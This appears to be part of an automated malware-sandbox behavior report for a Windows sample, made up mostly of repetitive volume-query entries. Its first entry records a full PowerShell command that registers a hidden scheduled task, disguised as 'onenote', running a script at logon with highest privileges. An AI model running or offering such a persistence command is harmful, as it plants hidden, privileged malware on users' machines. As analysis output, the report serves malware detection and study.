    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 28681' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network28681man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
    Source: logs.dat.22.drBinary or memory string: [2024/04/24 14:16:33 Program Manager]
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
